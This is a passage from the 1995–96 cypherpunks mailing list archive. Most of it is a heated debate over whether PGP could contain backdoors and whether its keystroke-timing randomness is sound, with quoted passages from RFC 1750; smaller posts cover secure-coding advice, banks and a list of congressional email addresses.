what the Utah Digital Signature Law does) but the bank, as rule-setter
is allowed to say that a digital receipt DOES bind the parties in some
way.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wendell Lee <wendell@singnet.com.sg>
Date: Wed, 28 Aug 1996 17:47:21 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Re: Code Review Guidelines (draft)]
Message-ID: <304171D2.77A3@singnet.com.sg>
MIME-Version: 1.0
Content-Type: text/plain

unsubcribe wendell@singnet.com.sg


To: hag@ai.mit.edu
Subject: Re: Code Review Guidelines (draft)
From: lists@lina.inka.de (Bernd Eckenfels)
Date: Wed, 28 Aug 1996 03:30:49 +0200 (MET DST)
Cc: ichudov@algebra.com, adam@homeport.org, firewalls@greatcircle.com,       cypherpunks@toad.com, coderpunks@toad.com
In-Reply-To: <199608272111.RAA23997@galapas.ai.mit.edu> from "Daniel Hagerty" at Aug 27, 96 05:11:39 pm
Sender: owner-cypherpunks@toad.com

Hi,

>     Much better, look at rfc822.  (I wouldn't consider *anything* that
> has the word "sendmail" in it a good reference).

its much better if you dont rely on the content of the string at all. Dont
use sh -c or system and you will be save. Simply asume that all characters
are valid in user suplied strings and treat them exactly that way... If they
need to be exporeted then unfortunately they need to be 'untainted' and this
should be done by positive not negative lists as mentioned in the
guidelines.

Greetings
Bernd

PS: I have collected the references on
http://www.inka.de/sites/lina/freefire-l/
-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )   ecki@{lina.inka.de,linux.de}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/A2C51749  eckes@irc  +4972573817  *plush*
(O____O)       If privacy is outlawed only Outlaws have privacy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Mon, 31 Jul 95 18:35:52 PDT
To: cman@communities.com
Subject: Re: U.S. Banks are not all that bad
Message-ID: <2925@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <v02120d01ac4219a2e38e@[199.2.22.120]> Douglas Barnes writes:
> 
...
> 
> I must say that I've had some absolutely amazingly bad experiences
> with banks in Asia, Mexico and Central America, so I'm a skeptic
> when it comes to assuming that non-US banks are light years better.

The U.K. banks make the U.S. look awfully good....

> Although I have no direct experience of European banking, I do know that
> the European banking industry, taken as a whole, is substantially
> behind the US banking industry in automation and efficiency. Most of

Oh yes oh yes oh yes...and I've banked with Lloyds on and off 
for 12 years...
> 
....
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mabidex1 <102415.404@CompuServe.com>
Date: Mon, 31 Jul 95 21:25:35 PDT
To: cypherpunks@toad.com
Subject: Info
Message-ID: <199508010425.AAA25683@dub-mail-svc-1.compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,
    I know next to nothing on this sort of stuff, but I do have a friend 
that works at the phone company...I'm REALLY interested in learning the 
ins and outs of the trade... have any Ideas where I can start? what files 
I should read, etc...

                            I would appreciate your help...
                                 Mabidex  102415.404@Compuserve.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 1 Aug 95 01:27:20 PDT
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: The Two Threads of Dr. Cohen
Message-ID: <v02120d0fac439bb79925@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



There are two threads to Dr. Cohen's arguments which bear
separation. One thread, with the implications of deliberate
wrongdoing on the part of Derek Atkins or others unnamed
should be dismissed out of hand. His comments regarding the
fundamental security properties of PGP and the burden of
proof for software security are right on target.

One has to draw the line somewhere with regard to what "they"
are out to do. PGP may have had weaknesses from the beginning,
but to suggest a deliberate change so subtle to escape PGP's
original authors is to descend into the realm of paranoia.
In addition, such allegations are extremely rude, and I think
Dr. Cohen owes Derek an apology.

At the same time, I think some apologies are in order with
respect to some very good points raised by Dr. Cohen about
software security. There is a whole sub-discipline of CS
devoted to the construction of trusted computer systems, which
if practiced can result in much greater assurances about the
reliability and security of the resultant software. This is
(I believe) the source of Dr. Cohen's assertion that the
burden of proof is on those who claim something is secure.

PGP is practically a poster child for how not to write a secure
piece of software. It has had a great many authors. It is non-
modular. It is large and complex. Simplicity is almost always
sacrificed at the altar of even slight performance gains. It
is absolutely infested with platform-dependent code. And these
are only the problems that directly impact its security... it's
also strongly tied to a tty-style interface and implements a
poorly-designed format.

With respect to "tiger teaming" PGP, I think it is a pretty
hopeless proposition. It is never, ever going to be as secure
as some people would like it to be. Given the past and current
bug discovery rate, it is almost inconceivable that there are
not exploitable bugs. This is not to say it isn't "pretty good",
but it is not what someone with a formal background in real
secure systems developement would ever bless as "secure".

PGP needs to be thrown away and rewritten from scratch. This
has, in fact, been done, but while this development effort has
been incrementally better, it still doesn't qualify as a
secure development approach. Also, nobody has this product yet
for reasons that I won't mention as we don't need to start
another tangential flamewar.

In any event, I think it's important for people to realize that
in the security community, the burden of proof _is_ on the
software developer, not on those claiming security problems.
I'm surprised Perry hasn't chimed in on this score yet, many
of his posts allude to similar notions of security by design
and by construction.

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Mon, 31 Jul 95 16:55:08 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312355.BAA22631@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Yesterday I heard in the radio that someone in America has developed
> some device which darkens the TV screen if there is sex or crime on TV.

> Does anyone know whether this is true and how it works?

It's called the 'Off' switch...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Dr. Linda D. Thompson - American Justice Federation)
Date: Tue, 1 Aug 95 00:13:03 PDT
To: aen!news@iquest.net
Subject: Software Glitch FYI
Message-ID: <m0sdBF0-001ehcC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


A Congressman's aid called me today to explain that if you send email to all
the Congressmen's offices at one time, the software at their end causes each
Congressman to receive 50 copies.

Please be sure everyone is aware of this glitch.

To prevent 50 copies from being sent to each Congressman, it is necessary to
break the mailing list into 5-10 addresses at a time.

Every list I've ever received of Congressional Emails has annoying spaces
and formats, so my list doesn't have that.  It can be copied directly into a
nickname box in Eudora or to a Bcc: list on a message.

senator@boxer.senate.gov
senator_brown@brown.senate.gov,
sen_dodd@dodd.senate.gov,
senator_lieberman@lieberman.senate.gov,
joe_biden@biden.senate.gov,
senator_coverdell@coverdell.senate.gov,
tom_harkin@harkin.senate.gov,
chuck_grassley@grassley.senate.gov,
larry_craig@craig.senate.gov,
dirk_kempthorne@kempthorne.senate.gov,
senator@simon.senate.gov,
senator@moseley-braun.senate.gov,
wendell_ford@ford.senate.gov,
senator@breaux.senate.gov,
senator@johnston.senate.gov,
senator@kennedy.senate.gov,
john_kerry@kerry.senate.gov,
senator@mikulski.senate.gov,
senator@levin.senate.gov,
mail_grams@grams.senate.gov,
senator@wellstone.senate.gov,
john_ashcroft@ashcroft.senate.gov,
max@baucus.senate.gov,
conrad_burns@burns.senate.gov,
bob@kerrey.senate.gov,
mailbox@gregg.senate.gov,
opinion@smith.senate.gov,
senator@bradley.senate.gov,
senator_Bingaman@bingaman.senate.gov,
senator_domenici@domenici.senate.gov,
senator_reid@reid.senate.gov,
senator_dewine@dewine.senate.gov,
nickles@rpc.senate.gov,
lugar@iquest.net
senator_chafee@chafee.senate.gov,
senator@hollings.senate.gov,
tom_daschle@daschle.senate.gov,
larry_pressler@pressler.senate.gov,
senator_frist@frist.senate.gov,
senator@hutchison.senate.gov,
senator_robb@robb.senate.gov,
senator@warner.senate.gov,
senator_leahy@leahy.senate.gov,
vermont@jeffords.senate.gov,
senator_Gorton@gorton.senate.gov,
russell_feingold@feingold.senate.gov,
senator@rockefeller.senate.gov,
everett@hr.house.gov,
budmail@hr.house.gov,
sbachus@hr.house.gov,
jdickey@hr.house.gov,
edpastor@hr.house.gov,
dcaucus@hr.house.gov,
woolsey@hr.house.gov,
gmiller@hr.house.gov,
sfnancy@hr.house.gov,
talk2tom@hr.house.gov,
petemail@hr.house.gov,
annagram@hr.house.gov,
tellnorm@hr.house.gov,
zoegram@hr.house.gov,
samfarr@hr.house.gov,
george@hr.house.gov,
andrea22@hr.house.gov,
tellbuck@hr.house.gov,
jharman@hr.house.gov,
tucker96@hr.house.gov,
housesst@hr.house.gov,
rpackard@hr.house.gov,
skaggs@hr.house.gov,
schaefer@hr.house.gov,
bozrah@hr.house.gov,
cshays@hr.house.gov,
delaware@hr.house.gov,
kthurman@hr.house.gov,
cstearns@hr.house.gov,
canady@hr.house.gov,
pdeutsch@hr.house.gov,
hastings@hr.house.gov,
jlinder@hr.house.gov,
georgia6@hr.house.gov,
saxby@hr.house.gov,
ga10@hr.house.gov,
runderwo@hr.house.gov,
brush@hr.house.gov,
luisg@hr.house.gov,
hfawell@hr.house.gov,
dhastert@hr.house.gov,
durbin@hr.house.gov,
johnhost@hr.house.gov,
emailpat@hr.house.gov,
edky01@hr.house.gov,
mward2@hr.house.gov,
bunning4@hr.house.gov,
torkma06@hr.house.gov,
jmoakley@hr.house.gov,
cardin@hr.house.gov,
tellhoek@hr.house.gov,
congehlr@hr.house.gov,
davecamp@hr.house.gov,
repsmith@hr.house.gov,
chrysler@hr.house.gov,
lrivers@hr.house.gov,
jconyers@hr.house.gov,
gil@hr.house.gov,
dminge@hr.house.gov,
mn03@hr.house.gov,
vento@hr.house.gov, 
tellbill@hr.house.gov,
tocollin@hr.house.gov,
oberstar@hr.house.gov,
goldsmit@iquest.net
talentmo@hr.house.gov,
demldr@hr.house.gov,
bemerson@hr.house.gov,
bthompson@hr.house.gov,
funnc02@hr.house.gov,
thechief@hr.house.gov,
mail2nc5@hr.house.gov,
crose@hr.house.gov,
myrick@hr.house.gov,
chtaylor@hr.house.gov,
melmail@hr.house.gov,
epomeroy@hr.house.gov,
zeliff@hr.house.gov,
franksnj@hr.house.gov, 
dzimmer@hr.house.gov,
mpforbes@hr.house.gov,
lazio@hr.house.gov,
tmanton@hr.house.gov,
molinari@hr.house.gov,
rangel@hr.house.gov,
jserrano@hr.house.gov,
engeline@hr.house.gov,
boehlert@hr.house.gov,
bpaxon@hr.house.gov,
portmail@hr.house.gov,
hokemail@hr.house.gov,
istook@hr.house.gov,
furseor1@hr.house.gov,
pdefazio@hr.house.gov,
murtha@hr.house.gov,
jonfox@hr.house.gov,
mchale@hr.house.gov,
pa16@hr.house.gov,
jspratt@hr.house.gov,
cwilson@hr.house.gov,
samtx03@hr.house.gov,
barton06@hr.house.gov,
doggett@hr.house.gov,
frost@hr.house.gov,
ggreen@hr.house.gov,
enidutah@hr.house.gov,
ortonut3@hr.house.gov,
opickett@hr.house.gov,
talk2bob@hr.house.gov,
ninthnet@hr.house.gov,
bsanders@igc.apc.org,
repwhite@hr.house.gov,
asklinda@hr.house.gov,
dunnwa08@hr.house.gov,
rtate@hr.house.gov,
mneumann@hr.house.gov,
badger02@hr.house.gov,
roth08@hr.house.gov,
commerce@hr.house.gov,
slabmgnt@hr.house.gov,
resource@hr.house.gov,
housesst@hr.house.gov,
smbizcom@hr.house.gov
============================================
Dr. Linda D. Thompson              
American Justice Federation                                               
3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203
Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211
Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939    
Internet: lindat@iquest.net

*******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Mon, 31 Jul 95 23:59:00 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010658.CAA18603@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This might seem a bit long, and I'd like to apologize to the real
cypherpunks for my ranting.

> > Because you seem to be pointing a finger at specific people.  Your
> > recent messages imply (to me, at least) that you think one or more
> > members of the MIT PGP project may have deliberately tampered with
> > some of the PGP code.
> 
> I don't believe I actually said any such thing.  Perhaps you are not
> reading (or I am not writing) carefully enough.  All I think I did was
> ask why I should believe they have not when they or those like them have
> done it before. 

You have.  I doubt it was intentional, but you have, continually.
Here are some snipets of things you've said.  First, you say that it
is a rational concern since PGP was taken over by us:

> The term paranoid is inappropriate in this context.  Paranoia refers to
> an irrational fear, while I am expressing a rational concern over a
> system that has been taken over by a (partially) government funded
> university and which has not been properly verified.  The history of
> cryptography (as they say) is (quite literally) littered with the dead
> bodies of people killed because somebody else thought a cryptosystem was
> good enough when it was not. 

Then you talk about the MIT version as if it were the original thing:

> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?

PGP 2.0 was released in September, 1992, from Europe, and many many
people have been examining it ever since.  I truly belive that there
are no backdoors.  Does that mean the program is completely bug-free?
Hardly.  Does it mean that some attack against PGP wont be discovered
in the future?  I dont know, I'm not a diviner, I cannot forsee the
future, and I have no idea what technology will come in the future.
For all I know, someone will prove that P=NP and all this will be for
naught.

Anyways, to get back to my claims of your hurtful statements:

> Why (specifically) do you think so? Because you claim it? Because the
> MIT maintainer claims it? You say MIT is not associated with the NSA,
> but they have historically been funded by the NSA and other federal
> agencies for work on information security.  Do you really think that the
> only information protected by PGP is dirty pictures? Do you somehow
> think that MIT and the NSA are above that sort of thing? All you have to
> do is look at history, and it should be clear that this appeal to
> authority is often used by those trying to cover things up.  If you know

I DO NOT GET PAID FOR ANY WORK I DO ON PGP!  I HAVE NEVER RECEIVED A
DIME FOR MY WORK.  I WORK ON PGP BECAUSE I BELIEVE IN IT.  Having said
that, I cannot BELIEVE you would have the Balls to say that the NSA
has bought me.  Go re-read what you've said.  You have just said that
the MIT PGP team, through MIT, is bound to be covering something up
because of historical fact.  

I have never said "Believe me when I said PGP is secure".  I have
continually asked for you to check on the security yourself.  But you
have continually refused to do that, and asked why it is secure!  So,
you refuse to look for yourself, and you refuse to believe it when you
are told.  So, what the hell do you want?  Do you want a line-by-line
examination of the code????  Sheesh!

> It cannot be safely assumed that any program is clean or that any one
> person or group is not involved with intentionally subverting security.
> That violates the fundamental principles of information protection.

You're right, which is why the source code is publically available.  I
would wholeheartedly agree with you if only binaries are shipped, but
the source is available.  Anyone can look through and verify the code.
Anyone can try to find weaknesses.  In fact, everyone is encouraged to
do so.  I don't see how _this_ "violates the fundamental principles of
information protection".

> You might be, but even if you are not, that doesn't mean there are no
> back doors.  Your inability to detect a backdoor gives me little
> confidence, since this is at least an NP-complete problem and, with all
> due respect, today, nobody can prove that PGP is free of backdoors

I think I've finally figured out where you are completely confused!!!
You are confusing "back door" with "bug".  FYI: A back door is usually
a means to make it easy for someone to get into a system.  For
example, if I put in code so that I could read every PGP message by
typing the passphrase "Setec Astronomy", that would be a backdoor.
The fact that httpd was exploitable, or sendmail holes, or etc. are
BUGS, not Back doors.

Your problem is that you are using these terms interchangably.  THEY
ARE NOT THE SAME.  Putting in a backdoor has the connotation of
intent.  A bug is an accidental occurrance that was a side effect of
poor coding, a typo, carelessness, confusion, inconsistency, etc.  A
back door, on the other hand, is a DELIBERATE ATTEMPT TO REDUCE OR
CIRCUMVENT SECURITY!

> "...Choosing random quantities to foil a resourceful and motivated
> adversary is surprisingly difficult.  ...recommends the use of truly
> random hardware techniques and shows that the existing hardware on many
> systems can be used for this purpose."
> 
> PGP does not use "truly random hardware techniques"

Oh?  It doesnt?  How can you say that?  In what way does it not do
this?  The RFC states, in your quote, that "existing hardware on many
systems can be used" for truly random hardware techniques.  Please,
substantiate your claim that PGP does not do this.  Show me code
segments which show it does not.  Show me an analysis that goes
contrary to the RFC.

> But the RFC acknowledges that these methods are highly suspect and should
> not be trusted.

You're right, it should not be blindly trusted.  Go read the code and
examine the algorithms to prove to yourself that it is secure.  I've
done that to the extent that I wish, and I believe it is secure.  But
you wont take my word for it, so go ahead and check!  Oh, wait, you
wont do that either.  Sorry.  I forgot.

> How is it "unscholarly, unprofessional, needlessly personal, and just
> plain insulting" to question the idea that hundreds of thousands of
> people are trusting their freedom to software that is probably not
> secure? I think it is highly unprofessional to try to claim that PGP is
> secure and to try to bolster that position by claiming that some
> "Request for Comments" supports it when that same said RFC refutes it.

Show me some proof that PGP is "probably not secure"?  Come on, there
is a finite probability that I can walk through a wall!  The laws of
quantum probablility give me this finite probability!  But I'd be hard
pressed to show you that I can walk through the wall.  It looks good
on paper, but it just ain't gonna happen.

As for the RFC, it does not refute that PGP is secure.  In fact, PGP
pretty much follows the RFCs guidelines.  You clearly have selective
reading.  A useful skill -- I should learn it.

> It has been my general impression that "scholarly" means, among other
> things, questioning the status quo and finding out where the generally
> accepted ideas break down.  I am a professional in the field of
> information protection, and I consider it highly unprofessional in this
> field to assume that systems are secure without ample evidence to
> support it.

Dont forget that you have to run PGP in some OS.  Please show me a
secure OS!  Given that the OS cannot be secure (using your logic it is
intuitively obvious that this is true) then how can you ask to see a
program any more secure than the enviornment in which it runs?  PGP
tries to be as secure as possible given the environment in which it is
being run.

> So far, I see no ample evidence to support the security of PGP's key
> generation algorithm relative to the concerns I have expressed.  Those
> concerns are fairly specific as far as I am concerned, but if you feel I
> have to demonstrate a specific attack that works in order to question
> the adequacy of protection, I think you have it backwards.

No, your concerns have been utterly vague.  The closest you've come to
being at all specific is some vague notion of analyzing keystrokes.
In every message I've responded to, I've asked you to expand upon what
you mean.  What kind of analysis do you mean?  How do you propose to
analyze keystroke timings?  Even if you have a probabalistic model of
keystroke timings, all you can possibly do is compare two different
probabilities to see if they are the same.  But that doesn't help you
limit the search on keys.

> If the people at MIT feel personally insulted because I have questioned
> their previously accepted ideas, it's just too bad.  I didn't say they

I'm not insulted that you are questioning PGP.  I am insulted because
in every message you have sent, you have postulated some conspiracy
with the government or postulated some intentional weakening of PGP.
Your statements could almost be construed as libelous, which is why I
feel insulted.  I feel extremely comfortable with people questioning
the security of PGP.  What I dont like is someone stating that it is
not secure, slaiming some sort of back door (which connotes some
intent to reduce the security) and does not back up the claim with any
proof.

> 	In my case, I question its security and have given at least one
> 	example of how it could be insecure.

And I've asked to you explain your conjecture, which you have
constantly either refused to do or intentionally ignored.

> 	If you do believe it is secure, you should be able to support
> 	your contention with more than reference to RFCs, vague
> 	comments, and claiming that you have read the code and didn't
> 	catch anything.

No matter what, PGP's security is based upon the security of RSA,
which in turn is based upon the difficult of factoring, which has
never been proven to be hard.  Therefore, there is always the
possibility that someone will find a polynomial factoring algorithm
which would completely destroy any security in PGP.

> 	If you cannot specifically address my question, say so, tell us
> 	all that the security of PGP is an open question, and either
> 	leave it open or go after closing it.

Ok.  Please explain what kind of keystroke timing analysis you
propose, and I will attempt to answer that, or concede your point.

> 	OR come up with another alternative that doesn't ignore my question,
> 	doesn't avoid the issue, doesn't appeal to authority that fails to
> 	adequately support your contentions, and doesn't claim that I an
> 	somehow unprofessional or scholarly for questioning an unproven
> 	contention.

Have you heard the thought experiment of putting a back-door in login
by modifying the C compiler to modilgy the C compiler to modify login?
Think about that in terms of the security of PGP -- you are always
going to be limited in security to the security of the system on which
you are running.

I only believe you are being unscholarly because you are making claims
without any supporting evidence.  _THAT_ is unscholarly!  

Now, if you are asking if PGP is completely bug free, I will be the
first to admit that it is not.  I am certain that there are latent
bugs in the code (and there are many that have been fixed since the
2.6.2 release).  However that has not been your statement nor your
questions.  You have asked about back doors, an intentional act to
reduce the security, and to that I vehemently say that there are none.

How do I know that you haven't been infected by a computer virus?
Perhaps there was a computer virus that flashed subliminal messages on
your screen to make you think you were L. Detweiler and think that
Desert Storm was the greatest thing since sliced bread?  Improbable?
Perhaps, but prove to me that this didn't happen!  How do you know
that Microsoft Windows doesn't send all your keystrokes to Bill Gates
for him to peruse?  Prove to me that we landed on the moon!  Some have
contended that it was all a hoax.  Prove to me that the universe
existed before I was concious of it.  How do I know that you exist?
Perhaps all this is a dream -- and if so, I sure hope to god I wake up
soon.

Good night.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 1 Aug 95 01:21:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP
In-Reply-To: <9508010049.AA05263@all.net>
Message-ID: <9508010821.AA20913@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[NB: Due to some as-yet-undiagnosed bugs in my .procmailrc, I apparently
sent all my mail received between sometime Saturday and about 17:00 PT Monday
straight into the bit bucket. *sigh*  Archives are a Good Thing. If you
sent me mail during that approximate period, please contact me again. Thanks.]

Dr. Frederick B. Cohen writes:
> Request for Comments: 1750 - Randomness Recommendations for Security
> 
> "...Choosing random quantities to foil a resourceful and motivated
> adversary is surprisingly difficult. ...recommends the use of truly
> random hardware techniques and shows that the existing hardware on many
> systems can be used for this purpose."
> 
> PGP does not use "truly random hardware techniques"

Correct. However, the excerpt of RFC 1750 you quoted above does not claim
that all PRNG techniques are unreasonably insecure, nor does it suggest that
they should never be used.

> "...For the present, the lack of generally available facilities for
> generating such unpredictable numbers is an open wound in the design of
> cryptographic software. ... the only safe strategy so far has been to
> force the local installation to supply a suitable routine to generate
> random numbers. To say the least, this is an awkward, error-prone and
> unpalatable solution." - 1994 - after PGP was implemented.

I agree with the RFC's authors that mandating provision of platform-
dependent routines is an awkward and unappealing strategy. Note, however,
that they characterize it as "the only safe strategy". They say that the
_strategy_ is error-prone; they do not say that all locally-supplied
routines are unreasonably insecure, and should not be used.   

> and then: "This informational document suggests techniques for producing
> random quantities that will be resistant to such attack. It recommends
> that future systems include hardware random number generation or provide
> access to existing hardware that can be used for this purpose."

This is just a reiteration of the first section you quoted.

> So I guess the RFC supports my contention and not [Derek Atkins'].
[...]
[re: PGP's key generation methods]
> But the RFC acknowledges that these methods are highly suspect and should
> not be trusted.

Where ?  Give a citation, please. It doesn't say anything of the sort in
the part you quoted previously. Furthermore, you inexplicably omitted all
mentions of keystroke-timing PRNG techniques in RFC 1750. Here are some
excerpts that strike me as particularly germane to the quality of the
randomness in PGP:

------------------------------------------------------------------------
4.2 Timing and Content of External Events

   It is possible to measure the timing and content of mouse movement,
   key strokes, and similar user events.  This is a reasonable source of
   unguessable data with some qualifications. On some machines, inputs
   such as key strokes are buffered.  Even though the user's inter-
   keystroke timing may have sufficient variation and unpredictability,
   there might not be an easy way to access that variation.  Another
   problem is that no standard method exists to sample timing details.
   This makes it hard to build standard software intended for
   distribution to a large range of machines based on this technique.

   The amount of mouse movement or the keys actually hit are usually
   easier to access than timings but may yield less unpredictability as
   the user may provide highly repetitive input.
[...]
6.2 Non-Hardware Sources of Randomness

   The best source of input for mixing would be a hardware randomness
   such as disk drive timing affected by air turbulence, audio input
   with thermal noise, or radioactive decay.  However, if that is not
   available there are other possibilities.  These include system
   clocks, system or input/output buffers, user/system/hardware/network
   serial numbers and/or addresses and timing, and user input.
   Unfortunately, any of these sources can produce limited or
   predicatable values under some circumstances.
[...]
   The use of multiple random inputs with a strong mixing function is
   recommended and can overcome weakness in any particular input.  For
   example, the timing and content of requested "random" user keystrokes
   can yield hundreds of random bits but conservative assumptions need
   to be made.  For example, assuming a few bits of randomness if the
   inter-keystroke interval is unique in the sequence up to that point
   and a similar assumption if the key hit is unique but assuming that
   no bits of randomness are present in the initial key value or if the
   timing or key value duplicate previous values.  The results of mixing
   these timings and characters typed could be further combined with
   clock values and other inputs.

   This strategy may make practical portable code to produce good random
   numbers for security even if some of the inputs are very weak on some
   of the target systems.  However, it may still fail against a high
   grade attack on small single user systems, especially if the
   adversary has ever been able to observe the generation process in the
   past.  A hardware based random source is still preferable.
-------------------------------------------------------------------------

I find it difficult to reconcile your claim that "the RFC acknowledges
that these methods are highly suspect and should not be trusted" with the
RFC's assertions that:

	"the timing and content of [...] key strokes [...] is a reasonable
	 source of unguessable data"

	"the timing and content of requested `random' user keystrokes can
	 yield hundreds of random bits"

	"this strategy may make practical portable code to produce good
	 random numbers for security"

etc. 

Having said that, allow me to state my position on some of the other
issues you've raised. I do not _know_ nor can I _prove_ that PGP has
no cryptographic backdoors. I happen to _believe_ that it does not --
among other things, I have met Derek Atkins and Jeff Schiller, and I
trust them in this regard. I don't consider that any reason for you to
believe that it's backdoor-free. In fact, I'm not interested in trying to
persuade you or anyone else that it is backdoor-free. By the same token,
I don't see any reason for anyone here to heed your demands that they
justify _their beliefs_ to _your satisfaction_. 

I remain rather baffled as to your motives in this mini-campaign. You said
that no-one can prove PGP has no backdoors, and many here essentially said
"what else is new ?". In the white paper about your small "secure" HTTP daemon,
thttpd, (found at http://all.net/ManAl/white/whitepaper.html, to save you the
trouble of more self-promotion ;), it says:

> Proof of program correctness to verify even simple security
> properties, for example, grows almost exponentially with the number of 
> program statements. Verifying a 100 line limited-language program for the
> simple security properties associated with the Bell-LaPadula model of
> security takes about 24 hours of CPU time on a Cray supercomputer. The 
> source code for the NCSA W3 server in widespread use today is about 6600
> lines long, so there is no computer around today that is likely to be able
> to verify its security (or more likely demonstrate its insecurity).

If we adopt this standard, it seems hopeless to "verify" the PGP source, as
others have noted here. [BTW, I read your detailed code walkthrough for
thttp with interest, and commend your work on that. I'm planning some
sort of similar review for a larger piece of code, and it's encouraging
to see other people pulling it off.]

Nobody has suggested a serious, better-understood alternative to PGP as it
is used today (except maybe 2.6.2ui (?), the current int'l. version, for
merely MIT-allergic people :)

So, in summary, we effectively can't know for sure that PGP is secure, but as
a practical matter we have no choice but to accept it, albeit with varying
degrees of caution. This is hardly novel. Did you have a point I missed
somewhere ?  Your good stuff tends to get lost in your rhetoric,
recriminations, and advertising....

[On a largely unrelated note, why does http://all.net/admin/usepolicy.html
contain the following warning ?  Specifically, why the age limit ?

	"This service is ONLY for use by legally competent adults human [sic]
	 individuals of age 18 or older. If you do not meet these criteria, 
	 you should immediately cease and desist your use of this service."]

-Futplex <futplex@pseudonym.com>

"...because of Dr. Cohen's frequent, blatant, and intentional disregard for
 the guidelines that this list operates under, and because of his apparent
 disregard for the frequently expressed opinions of many of the members of
 this list that they don't appreciate his antics, I've configured Majordomo 
 to divert all messages he posts to Firewalls to the list owner for review 
 and approval before posting..." -Brent Chapman, July 24, 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 1 Aug 95 02:01:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <199508010658.CAA18603@charon.MIT.EDU>
Message-ID: <9508010900.AA21295@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


RFC 1750 says:
# "...Choosing random quantities to foil a resourceful and motivated
# adversary is surprisingly difficult.  ...recommends the use of truly
# random hardware techniques and shows that the existing hardware on many
# systems can be used for this purpose."

Dr. Frederick B. Cohen writes:
$ PGP does not use "truly random hardware techniques"

I wrote:
% Correct.

Derek Atkins writes:
> Oh?  It doesnt?  How can you say that?  In what way does it not do
> this?  The RFC states, in your quote, that "existing hardware on many
> systems can be used" for truly random hardware techniques.  Please,
> substantiate your claim that PGP does not do this.  Show me code
> segments which show it does not.  Show me an analysis that goes
> contrary to the RFC.

Warning: I'm about to quibble over semantics. I'm not being accused of being
a NSA lackey (yet), so I guess I have more time for pettiness ;)

In the context of RFC 1750, it appears to me that the phrase "truly random
hardware techniques" does not refer to the type of RNG method employed in
PGP. Section 5.3 discusses the use of built-in digitizers of analog natural
sources, and turbulence in disk drive chambers, as the "truly random" 
"existing hardware" techniques. Keystroke timing only seems to fall under
6.2, Non-Hardware Sources of Randomness.

-----------------------------------------------------------------------
5.3 Existing Hardware Can Be Used For Randomness

   As described below, many computers come with hardware that can, with
   care, be used to generate truly random quantities.

5.3.1 Using Existing Sound/Video Input
[...]
5.3.2 Using Existing Disk Drives
[...]
-----------------------------------------------------------------------
6.2 Non-Hardware Sources of Randomness

   The best source of input for mixing would be a hardware randomness
   such as disk drive timing affected by air turbulence, audio input
   with thermal noise, or radioactive decay.  However, if that is not
   available there are other possibilities.  These include system
   clocks, system or input/output buffers, user/system/hardware/network
   serial numbers and/or addresses and timing, and user input. 
-----------------------------------------------------------------------

-Futplex <futplex@pseudonym.com>
"We love our lovin' -- but not like we love our freedom" -Joni Mitchell



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 1 Aug 95 03:18:50 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> Why (specifically) do you think so? Because you claim it? Because the
> MIT maintainer claims it? You say MIT is not associated with the NSA,
> but they have historically been funded by the NSA and other federal
> agencies for work on information security.  Do you really think that the

Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
System" and started this whole Public Key-Private Key thing.  It was all 
part of a plot.  If they hadn't done that we might all be using stronger 
systems today.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
